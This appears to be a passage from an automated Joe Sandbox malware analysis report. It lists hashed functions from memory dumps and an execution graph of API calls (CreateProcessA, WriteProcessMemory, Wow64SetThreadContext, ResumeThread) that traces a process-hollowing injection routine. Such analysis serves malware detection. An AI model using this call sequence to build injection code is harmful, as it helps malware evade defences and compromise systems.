                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ee9b209cf3c38a5b8f8286e1c3c20eece1a5830707f20bc5019ca21ba4201a6
                                              • Instruction ID: e38cc7fdff406e690e2ff616c9027a2f53079d320868d3c4e192a3e582eff506
                                              • Opcode Fuzzy Hash: 1ee9b209cf3c38a5b8f8286e1c3c20eece1a5830707f20bc5019ca21ba4201a6
                                              • Instruction Fuzzy Hash: 9141CDB0D003499FDB14DFA9C584ADEBFB5FF48314F24842AE809AB254DB75A985CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018750A0 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d95ee1d86c0a1ed76cfc25f836138d3fdcc987c946476b9fc55b7b483cff64b
                                              • Instruction ID: dc5e065cabae3d8e51796d1f74d2ed7fd825c47f65a5b77bff6c624d1b2660c9
                                              • Opcode Fuzzy Hash: 8d95ee1d86c0a1ed76cfc25f836138d3fdcc987c946476b9fc55b7b483cff64b
                                              • Instruction Fuzzy Hash: 93315E30B00606CFDB15EB28D5546AE77B6AF89345F2144ACD405EB391EB3ADE01CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018750B0 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bf31aaedde7d543ac1e7db8516c4784af585722f07639bfe14989d242a558b8
                                              • Instruction ID: 15e4e32b4d144ffdddd2ae043b98890ba60e43606db9301d3004a9d11cbe84c1
                                              • Opcode Fuzzy Hash: 5bf31aaedde7d543ac1e7db8516c4784af585722f07639bfe14989d242a558b8
                                              • Instruction Fuzzy Hash: 8A315C30B00605CFDB15EB38D5646AE77B6AF49345F2144A8C505EB3A1EF3ADE01CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01871492 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5abfa162e813a0b346eb8fe49f1951e2d4eb701407005046b98c38f9fa5f2fac
                                              • Instruction ID: 9e5c7c826c377b15c4448bc38edc19a1248c39870f1170194819548f99f1c8ed
                                              • Opcode Fuzzy Hash: 5abfa162e813a0b346eb8fe49f1951e2d4eb701407005046b98c38f9fa5f2fac
                                              • Instruction Fuzzy Hash: 3B21E531B002518FDF21EB7CC4882AD7BE6EF46314F140479E506EB751D639DA81CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018716A8 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4212e499849281780f8f7326ddb3f8db0bf01cd56b944622d0ce54175b92d981
                                              • Instruction ID: 552d353af2c136db57fcad082aa9235bc7c87b1d5154250b0a2891f739e653c5
                                              • Opcode Fuzzy Hash: 4212e499849281780f8f7326ddb3f8db0bf01cd56b944622d0ce54175b92d981
                                              • Instruction Fuzzy Hash: 4321E7306041028FDB22DB3CF988B79776EEB49318F009665D506CB66AE738DE49CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01879258 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67cee134583822120d1859a0b334905184e37c49555eb45e30fa39c73f49157a
                                              • Instruction ID: b4f2a6b112ae573fab699ceb77d9cc7027faf526dbb247639b6dfa55d934443f
                                              • Opcode Fuzzy Hash: 67cee134583822120d1859a0b334905184e37c49555eb45e30fa39c73f49157a
                                              • Instruction Fuzzy Hash: 48318F31E1020A9BDB05CFA8C58469EF7B2FF89314F10D619E819EB355EB74D942CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01879268 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 067341aa26c49b3df6d69f1fe2f1b341870f347e711109d8ae8e4a665b429f54
                                              • Instruction ID: ae8cedd0b2eabe7901c181b818c6411601a2dd22dac1515fcb84dc6c0a0bb177
                                              • Opcode Fuzzy Hash: 067341aa26c49b3df6d69f1fe2f1b341870f347e711109d8ae8e4a665b429f54
                                              • Instruction Fuzzy Hash: 34218D30E1020A9BDB05DFA8D4846AEFBB6FF89314F10D619E819EB355DB70D942CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01879158 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c21c3d1dcfa177f68c8479027a48bfb46dcb0cf8a4106d25af50c95af8a426fc
                                              • Instruction ID: e513b13354aa743abe6fec4398804e018a3d08edefb3b9f3b2aceb876ab044dd
                                              • Opcode Fuzzy Hash: c21c3d1dcfa177f68c8479027a48bfb46dcb0cf8a4106d25af50c95af8a426fc
                                              • Instruction Fuzzy Hash: 6A219030E006068BCB19CFA8D4545DEB7B2AF89318F20851AE815FB350DB70EA46CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01874F90 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a38b199a27f20343f4786306dfdb47ec4286386746e0a8052164dfe8ddc15b27
                                              • Instruction ID: 093b0c6621f8eb8c770600f3e7f936e0f05c4140e490056c76c6752d043db29a
                                              • Opcode Fuzzy Hash: a38b199a27f20343f4786306dfdb47ec4286386746e0a8052164dfe8ddc15b27
                                              • Instruction Fuzzy Hash: 5221FB30A40205CFDB55EB78D558AAE7BF1EF8D314B2184A8E506EB3A5EB35DD00CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0179D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257574683.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_179d000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a433ae96a3b1aff519b52e461d66d7cf1018670d50497928ab925b118e683a02
                                              • Instruction ID: 6b111b8fa533845955144b0be8a076309a19c9a0de99d5041d4b9feb435cb276
                                              • Opcode Fuzzy Hash: a433ae96a3b1aff519b52e461d66d7cf1018670d50497928ab925b118e683a02
                                              • Instruction Fuzzy Hash: 3121D071604204DFDF25DFACE984B26FF65FB88354F20C5A9D94A4B256C33AD40ACA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01879168 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffe46ee4984875b931aa8bea735edb6030de4bf43f667a9c8572a80afbe67cdd
                                              • Instruction ID: 2722295bb37324d8e84456ec376138a135a9b1b62b08c1cddcd93400e0c91503
                                              • Opcode Fuzzy Hash: ffe46ee4984875b931aa8bea735edb6030de4bf43f667a9c8572a80afbe67cdd
                                              • Instruction Fuzzy Hash: 05219F30E0060A9BCB19CFA8D85499EF7B2AF89324F11C51AE815FB350DB70EA46CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01871882 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a7234cbbb2d7256f75f30d7d614a3e3595ba2ba8b815297bc1f0eadfd4635e5d
                                              • Instruction ID: 73d572e380a3e6279df52c4d7739dc61a292f1391b786a4f3dc45381c5864976
                                              • Opcode Fuzzy Hash: a7234cbbb2d7256f75f30d7d614a3e3595ba2ba8b815297bc1f0eadfd4635e5d
                                              • Instruction Fuzzy Hash: D5212A30B40246CFDB15EB28C5587AE77F6AF49304F6004A8D505EB7A1DB36DE42CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01871890 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: adf37acbff06c31ef13d10b642fd44fbf8f21e219d8adc5dcacf9441252bb0d7
                                              • Instruction ID: d8d1388c3a36cebb3491e7adf5cbb04d57eb42594aa2449b2e8c34b16bf6d2db
                                              • Opcode Fuzzy Hash: adf37acbff06c31ef13d10b642fd44fbf8f21e219d8adc5dcacf9441252bb0d7
                                              • Instruction Fuzzy Hash: B2212A30B40209CFDB15EB68C5587AE77F6AB89304F600468D506EB7A1DF35DE41CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018716B8 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7d48822716c80b7e902dcd391e47c7fed730ccfdf30cadbebca6bda3430fce6
                                              • Instruction ID: 35000d5949dffeea7a5b1d6560b7843553f4da6a89328a41bab45559c508091e
                                              • Opcode Fuzzy Hash: d7d48822716c80b7e902dcd391e47c7fed730ccfdf30cadbebca6bda3430fce6
                                              • Instruction Fuzzy Hash: 142184306001028FDF25DB2CF988B69776EEB49358F109A25D50AC7659DB38DE49CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01874FA0 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d63ada84a93b31c3da2d8d7a09915248d074c9666af43f26a4e3a4fa8efb02b
                                              • Instruction ID: 5f8fa70c10e1aadcd1cf912436bc89cf23ea57b6918835e13f2e77ae88318618
                                              • Opcode Fuzzy Hash: 8d63ada84a93b31c3da2d8d7a09915248d074c9666af43f26a4e3a4fa8efb02b
                                              • Instruction Fuzzy Hash: BE21E734740205CFDB55EB78C558AAE77F1EB89314F214468E506EB3A1EB35DE04CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01870838 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 38723dd36f78e8767afb1732fa76ece700168da2ac5753d56ffa0f23af69005f
                                              • Instruction ID: 85cba0d766bb7603350cc52731dd8e5d02fa7397782a0d8d85832b27308334da
                                              • Opcode Fuzzy Hash: 38723dd36f78e8767afb1732fa76ece700168da2ac5753d56ffa0f23af69005f
                                              • Instruction Fuzzy Hash: AC11B230A042058BEF225A7CD80476A77A5DB47314F24497AF846CB286EA79DE458BD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01870848 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 029553ded40d8b5a32e62b83e2e2a4c88956c8c9cfe792b6066b972b8e66041b
                                              • Instruction ID: ec51295ef69796e6d3231890f86f157a5835bba32a98155e529106fec56a2d04
                                              • Opcode Fuzzy Hash: 029553ded40d8b5a32e62b83e2e2a4c88956c8c9cfe792b6066b972b8e66041b
                                              • Instruction Fuzzy Hash: B4118230B002058FEF65AA7DD90472A76AAEB46314F204979F506CB296EA38CE458FD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018780F9 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca3cfac6c44abc551b90ea11a23000a65e51f2496d1ba000513a90f14cdcf918
                                              • Instruction ID: 002ed3fb171b1eb3144dda001af4e1dda2071d1f14df087ee73a651b2aeb20b0
                                              • Opcode Fuzzy Hash: ca3cfac6c44abc551b90ea11a23000a65e51f2496d1ba000513a90f14cdcf918
                                              • Instruction Fuzzy Hash: 8D11A530640106DFCB06EB68F58469D7B6AEF85314F108679C509CB255CB39ED07CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018714A0 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d47fc5f3ab2a14612fcd97c0167405feaeee6fdc30275f9a204116f7fe327f8
                                              • Instruction ID: caae0fba36a59bd247704e3bd1db55e0048cfcebd510d26c8c8a1bbc91abdbeb
                                              • Opcode Fuzzy Hash: 2d47fc5f3ab2a14612fcd97c0167405feaeee6fdc30275f9a204116f7fe327f8
                                              • Instruction Fuzzy Hash: 64014071B012158FCF25EFBC88941ADBBF5EF49310B150479E80AE7641E775EA41CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0179D017 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257574683.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_179d000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: ed36f0eaef0e726225996a913fc143ad0cf5f029c291728b586b3b1112644b58
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: D211DD75504280CFDB22CF58E5C4B15FFA2FB88314F24C6AAD8494B656C33AD40ACBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0187152C Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7992b782c0322fe168c30a8504103a9cc22b2e9fffbd1f8c4d6b14b702f138a
                                              • Instruction ID: 23f041f32e922c43d4c08b096ce19732a6ee656a39ab93b4f1aa78b63c40fff5
                                              • Opcode Fuzzy Hash: f7992b782c0322fe168c30a8504103a9cc22b2e9fffbd1f8c4d6b14b702f138a
                                              • Instruction Fuzzy Hash: 7BF02B73A041508BDB268BAC88D41ACBFA1EE5531571D00D6F846EBA51D231DB42C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01877098 Relevance: .0, Instructions: 34COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8e419ad3862d4c3a967063004de20ac5ee4ed5d95a0ef6f66e0327658c57cd1
                                              • Instruction ID: 0841bbc38f1a17b6d2f617b0b59358e1e480ec0504f19e98355ebf596f36b904
                                              • Opcode Fuzzy Hash: d8e419ad3862d4c3a967063004de20ac5ee4ed5d95a0ef6f66e0327658c57cd1
                                              • Instruction Fuzzy Hash: B5F03739B40108CFDB14EB68D598B6D77B2EF88319F6040A8E50ACB3A4CB35AD02CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01878108 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 837a7e00215834959184f1a107a83ec7221f02eb96473eed60384ab3bccb77b3
                                              • Instruction ID: 1bc60b092f4e831f130cbe27ac30062d2884ea469366d8b658b39cbd445b10c5
                                              • Opcode Fuzzy Hash: 837a7e00215834959184f1a107a83ec7221f02eb96473eed60384ab3bccb77b3
                                              • Instruction Fuzzy Hash: D5F0313094010AEFCF05EFB8F9449AD7BBAEF44304F509678C5089B258DF35AE0A8B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01876C14 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3257978011.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_1870000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
                                              • Instruction ID: d75c73f74147e78e181d1db040a143f977ee35371540044cee12fe44de016a28
                                              • Opcode Fuzzy Hash: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
                                              • Instruction Fuzzy Hash: D5C012363040504FD501972CE05447837B1DBCA1693240196D144CB332CE119802CB00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:12.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:215
                                              Total number of Limit Nodes:4
                                              execution_graph 18068 1094a28 18069 1094a31 18068->18069 18070 1094a37 18069->18070 18072 1094b20 18069->18072 18073 1094b45 18072->18073 18077 1094c20 18073->18077 18081 1094c30 18073->18081 18079 1094c30 18077->18079 18078 1094d34 18078->18078 18079->18078 18085 1094608 18079->18085 18083 1094c57 18081->18083 18082 1094d34 18082->18082 18083->18082 18084 1094608 CreateActCtxA 18083->18084 18084->18082 18086 1095cc0 CreateActCtxA 18085->18086 18088 1095d83 18086->18088 18088->18088 18309 6127ce0 18311 6127c23 18309->18311 18310 6127d76 18311->18310 18312 6129458 15 API calls 18311->18312 18313 61293d8 15 API calls 18311->18313 18314 61293e8 15 API calls 18311->18314 18315 6129419 15 API calls 18311->18315 18312->18310 18313->18310 18314->18310 18315->18310 18050 61240da 18051 61240ea 18050->18051 18055 6126b18 18051->18055 18059 6126b08 18051->18059 18052 6124232 18056 6126b4b 18055->18056 18057 6126bb9 18056->18057 18063 6126ea0 18056->18063 18057->18052 18060 6126b4b 18059->18060 18061 6126bb9 18060->18061 18062 6126ea0 ResumeThread 18060->18062 18061->18052 18062->18061 18064 6126f13 ResumeThread 18063->18064 18066 6126eae 18063->18066 18067 6126f79 18064->18067 18066->18057 18067->18057 18089 6127f78 18090 6127f91 18089->18090 18091 6127e0d 18089->18091 18092 6127e1d 18091->18092 18097 6129419 18091->18097 18114 61293e8 18091->18114 18131 61293d8 18091->18131 18148 6129458 18091->18148 18099 6129426 18097->18099 18098 61293c1 18098->18092 18099->18098 18165 6129aa5 18099->18165 18170 6129844 18099->18170 18175 6129d27 18099->18175 18185 6129a46 18099->18185 18191 6129ce1 18099->18191 18195 6129881 18099->18195 18200 6129b03 18099->18200 18206 6129959 18099->18206 18211 6129b3b 18099->18211 18216 6129e70 18099->18216 18222 6129bd0 18099->18222 18226 6129ed3 18099->18226 18232 6129c92 18099->18232 18241 61298e9 18099->18241 18115 61293fa 18114->18115 18115->18092 18116 6129c92 6 API calls 18115->18116 18117 6129ed3 3 API calls 18115->18117 18118 6129bd0 2 API calls 18115->18118 18119 6129e70 3 API calls 18115->18119 18120 612947a 18115->18120 18121 6129b3b 3 API calls 18115->18121 18122 6129959 2 API calls 18115->18122 18123 6129b03 3 API calls 18115->18123 18124 6129881 2 API calls 18115->18124 18125 6129ce1 2 API calls 18115->18125 18126 6129a46 3 API calls 18115->18126 18127 6129d27 6 API calls 18115->18127 18128 6129844 2 API calls 18115->18128 18129 6129aa5 2 API calls 18115->18129 18130 61298e9 2 API calls 18115->18130 18116->18120 18117->18120 18118->18120 18119->18120 18120->18092 18121->18120 18122->18120 18123->18120 18124->18120 18125->18120 18126->18120 18127->18120 18128->18120 18129->18120 18130->18120 18132 61293e6 18131->18132 18132->18092 18133 6129c92 6 API calls 18132->18133 18134 6129ed3 3 API calls 18132->18134 18135 6129bd0 2 API calls 18132->18135 18136 6129e70 3 API calls 18132->18136 18137 612947a 18132->18137 18138 6129b3b 3 API calls 18132->18138 18139 6129959 2 API calls 18132->18139 18140 6129b03 3 API calls 18132->18140 18141 6129881 2 API calls 18132->18141 18142 6129ce1 2 API calls 18132->18142 18143 6129a46 3 API calls 18132->18143 18144 6129d27 6 API calls 18132->18144 18145 6129844 2 API calls 18132->18145 18146 6129aa5 2 API calls 18132->18146 18147 61298e9 2 API calls 18132->18147 18133->18137 18134->18137 18135->18137 18136->18137 18137->18092 18138->18137 18139->18137 18140->18137 18141->18137 18142->18137 18143->18137 18144->18137 18145->18137 18146->18137 18147->18137 18149 6129472 18148->18149 18150 612947a 18149->18150 18151 6129c92 6 API calls 18149->18151 18152 6129ed3 3 API calls 18149->18152 18153 6129bd0 2 API calls 18149->18153 18154 6129e70 3 API calls 18149->18154 18155 6129b3b 3 API calls 18149->18155 18156 6129959 2 API calls 18149->18156 18157 6129b03 3 API calls 18149->18157 18158 6129881 2 API calls 18149->18158 18159 6129ce1 2 API calls 18149->18159 18160 6129a46 3 API calls 18149->18160 18161 6129d27 6 API calls 18149->18161 18162 6129844 2 API calls 18149->18162 18163 6129aa5 2 API calls 18149->18163 18164 61298e9 2 API calls 18149->18164 18150->18092 18151->18150 18152->18150 18153->18150 18154->18150 18155->18150 18156->18150 18157->18150 18158->18150 18159->18150 18160->18150 18161->18150 18162->18150 18163->18150 18164->18150 18166 6129aab 18165->18166 18246 6127671 18166->18246 18250 6127678 18166->18250 18167 6129ad1 18167->18098 18171 6129882 18170->18171 18254 6127810 18171->18254 18258 6127805 18171->18258 18176 6129c91 18175->18176 18177 6129caf 18175->18177 18262 61273f0 18176->18262 18266 61273e8 18176->18266 18270 61273ef 18176->18270 18178 6129f09 18177->18178 18179 6126ea0 ResumeThread 18177->18179 18274 6126f00 18177->18274 18278 6126f08 18177->18278 18178->18098 18179->18178 18186 6129a63 18185->18186 18188 6126ea0 ResumeThread 18186->18188 18189 6126f00 ResumeThread 18186->18189 18190 6126f08 ResumeThread 18186->18190 18187 6129f09 18187->18098 18188->18187 18189->18187 18190->18187 18282 6127580 18191->18282 18286 6127588 18191->18286 18192 6129d08 18192->18098 18196 612988c 18195->18196 18198 6127810 CreateProcessA 18196->18198 18199 6127805 CreateProcessA 18196->18199 18197 6129920 18197->18098 18197->18197 18198->18197 18199->18197 18201 6129d48 18200->18201 18290 61274c0 18201->18290 18294 61274c8 18201->18294 18298 61274c7 18201->18298 18202 6129d69 18207 6129967 18206->18207 18209 6127580 WriteProcessMemory 18207->18209 18210 6127588 WriteProcessMemory 18207->18210 18208 6129dbc 18208->18098 18209->18208 18210->18208 18212 612a14c 18211->18212 18213 61273f0 Wow64SetThreadContext 18212->18213 18214 61273e8 Wow64SetThreadContext 18212->18214 18215 61273ef Wow64SetThreadContext 18212->18215 18213->18212 18214->18212 18215->18212 18217 6129e76 18216->18217 18219 6126ea0 ResumeThread 18217->18219 18220 6126f00 ResumeThread 18217->18220 18221 6126f08 ResumeThread 18217->18221 18218 6129f09 18218->18098 18219->18218 18220->18218 18221->18218 18224 6127580 WriteProcessMemory 18222->18224 18225 6127588 WriteProcessMemory 18222->18225 18223 6129945 18224->18223 18225->18223 18227 6129ed9 18226->18227 18229 6126ea0 ResumeThread 18227->18229 18230 6126f00 ResumeThread 18227->18230 18231 6126f08 ResumeThread 18227->18231 18228 6129f09 18228->18098 18229->18228 18230->18228 18231->18228 18238 61273f0 Wow64SetThreadContext 18232->18238 18239 61273e8 Wow64SetThreadContext 18232->18239 18240 61273ef Wow64SetThreadContext 18232->18240 18233 6129caf 18234 6129f09 18233->18234 18235 6126ea0 ResumeThread 18233->18235 18236 6126f00 ResumeThread 18233->18236 18237 6126f08 ResumeThread 18233->18237 18234->18098 18235->18234 18236->18234 18237->18234 18238->18233 18239->18233 18240->18233 18242 61298ef 18241->18242 18243 6129920 18242->18243 18244 6127810 CreateProcessA 18242->18244 18245 6127805 CreateProcessA 18242->18245 18243->18098 